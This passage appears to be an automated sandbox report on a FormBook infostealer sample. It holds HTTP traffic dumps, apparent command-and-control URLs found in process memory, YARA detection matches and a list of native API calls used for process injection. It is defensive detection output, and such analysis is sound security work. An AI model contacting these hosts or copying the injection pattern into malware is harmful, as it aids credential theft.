                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:06:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:06:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:06:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:06:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: EPnOHZVVNotZ.exe, 00000009.00000002.3285546671.0000000005430000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.likesharecomment.net
                Source: EPnOHZVVNotZ.exe, 00000009.00000002.3285546671.0000000005430000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.likesharecomment.net/nqht/
                Source: tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tzutil.exe, 00000008.00000002.3284671784.00000000039F6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
                Source: tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tzutil.exe, 00000008.00000002.3284671784.00000000039F6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                Source: EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dq0ib5xlct7tw.cloudfront.net/
                Source: tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://l3filejson4dvd.josyliving.com/favicon.ico
                Source: tzutil.exe, 00000008.00000002.3282626615.000000000280B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: tzutil.exe, 00000008.00000002.3282626615.00000000027EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: tzutil.exe, 00000008.00000003.2513107105.0000000007865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: tzutil.exe, 00000008.00000002.3282626615.000000000280B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: tzutil.exe, 00000008.00000002.3282626615.000000000280B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033O~
                Source: tzutil.exe, 00000008.00000002.3282626615.000000000280B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: tzutil.exe, 00000008.00000002.3282626615.00000000027EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: tzutil.exe, 00000008.00000002.3284671784.00000000039F6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s.yimg.com/wi/ytc.js
                Source: tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: tzutil.exe, 00000008.00000002.3284671784.00000000039F6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
                Source: tzutil.exe, 00000008.00000002.3284671784.0000000003B88000.00000004.10000000.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003698000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283931333.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3283866116.00000000030E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2326212398.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0042C953 NtClose,4_2_0042C953
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392B60 NtClose,LdrInitializeThunk,4_2_01392B60
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01392DF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01392C70
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013935C0 NtCreateMutant,LdrInitializeThunk,4_2_013935C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01394340 NtSetContextThread,4_2_01394340
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01394650 NtSuspendThread,4_2_01394650
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392BA0 NtEnumerateValueKey,4_2_01392BA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392B80 NtQueryInformationFile,4_2_01392B80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392BF0 NtAllocateVirtualMemory,4_2_01392BF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392BE0 NtQueryValueKey,4_2_01392BE0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392AB0 NtWaitForSingleObject,4_2_01392AB0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392AF0 NtWriteFile,4_2_01392AF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392AD0 NtReadFile,4_2_01392AD0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392D30 NtUnmapViewOfSection,4_2_01392D30
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392D10 NtMapViewOfSection,4_2_01392D10
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392D00 NtSetInformationFile,4_2_01392D00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392DB0 NtEnumerateKey,4_2_01392DB0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392DD0 NtDelayExecution,4_2_01392DD0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392C00 NtQueryInformationProcess,4_2_01392C00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392C60 NtCreateKey,4_2_01392C60
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392CA0 NtQueryInformationToken,4_2_01392CA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392CF0 NtOpenProcess,4_2_01392CF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392CC0 NtQueryVirtualMemory,4_2_01392CC0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392F30 NtCreateSection,4_2_01392F30
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392F60 NtCreateProcessEx,4_2_01392F60
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392FB0 NtResumeThread,4_2_01392FB0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392FA0 NtQuerySection,4_2_01392FA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392F90 NtProtectVirtualMemory,4_2_01392F90
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392FE0 NtCreateFile,4_2_01392FE0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392E30 NtWriteVirtualMemory,4_2_01392E30
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392EA0 NtAdjustPrivilegesToken,4_2_01392EA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392E80 NtReadVirtualMemory,4_2_01392E80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392EE0 NtQueueApcThread,4_2_01392EE0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01393010 NtOpenDirectoryObject,4_2_01393010
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01393090 NtSetValueKey,4_2_01393090
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013939B0 NtGetContextThread,4_2_013939B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01393D10 NtOpenProcessToken,4_2_01393D10
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01393D70 NtOpenThread,4_2_01393D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E84340 NtSetContextThread,LdrInitializeThunk,8_2_02E84340
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E84650 NtSuspendThread,LdrInitializeThunk,8_2_02E84650
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82AF0 NtWriteFile,LdrInitializeThunk,8_2_02E82AF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82AD0 NtReadFile,LdrInitializeThunk,8_2_02E82AD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82BE0 NtQueryValueKey,LdrInitializeThunk,8_2_02E82BE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_02E82BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_02E82BA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82B60 NtClose,LdrInitializeThunk,8_2_02E82B60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82EE0 NtQueueApcThread,LdrInitializeThunk,8_2_02E82EE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_02E82E80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82FE0 NtCreateFile,LdrInitializeThunk,8_2_02E82FE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82FB0 NtResumeThread,LdrInitializeThunk,8_2_02E82FB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82F30 NtCreateSection,LdrInitializeThunk,8_2_02E82F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_02E82CA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82C60 NtCreateKey,LdrInitializeThunk,8_2_02E82C60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_02E82C70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_02E82DF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82DD0 NtDelayExecution,LdrInitializeThunk,8_2_02E82DD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_02E82D30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82D10 NtMapViewOfSection,LdrInitializeThunk,8_2_02E82D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E835C0 NtCreateMutant,LdrInitializeThunk,8_2_02E835C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E839B0 NtGetContextThread,LdrInitializeThunk,8_2_02E839B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82AB0 NtWaitForSingleObject,8_2_02E82AB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82B80 NtQueryInformationFile,8_2_02E82B80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82EA0 NtAdjustPrivilegesToken,8_2_02E82EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82E30 NtWriteVirtualMemory,8_2_02E82E30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82FA0 NtQuerySection,8_2_02E82FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82F90 NtProtectVirtualMemory,8_2_02E82F90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82F60 NtCreateProcessEx,8_2_02E82F60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82CF0 NtOpenProcess,8_2_02E82CF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82CC0 NtQueryVirtualMemory,8_2_02E82CC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82C00 NtQueryInformationProcess,8_2_02E82C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82DB0 NtEnumerateKey,8_2_02E82DB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82D00 NtSetInformationFile,8_2_02E82D00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E83090 NtSetValueKey,8_2_02E83090
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E83010 NtOpenDirectoryObject,8_2_02E83010
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E83D70 NtOpenThread,8_2_02E83D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E83D10 NtOpenProcessToken,8_2_02E83D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026B96E0 NtDeleteFile,8_2_026B96E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026B9780 NtClose,8_2_026B9780
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026B9480 NtCreateFile,8_2_026B9480
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026B95F0 NtReadFile,8_2_026B95F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026B98E0 NtAllocateVirtualMemory,8_2_026B98E0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_00EAD74C0_2_00EAD74C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073755D90_2_073755D9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073764580_2_07376458
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737D2800_2_0737D280
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073742F00_2_073742F0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737BC580_2_0737BC58
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_07374BA00_2_07374BA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737DB800_2_0737DB80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073737580_2_07373758
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073737930_2_07373793
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737C6380_2_0737C638
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737C6480_2_0737C648
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073786B00_2_073786B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073786C00_2_073786C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073774B80_2_073774B8
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073774A80_2_073774A8
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737633A0_2_0737633A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073763710_2_07376371
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073763910_2_07376391
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737D2700_2_0737D270
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737C2500_2_0737C250
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073742500_2_07374250
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737C2410_2_0737C241
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073742DF0_2_073742DF
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737E1300_2_0737E130
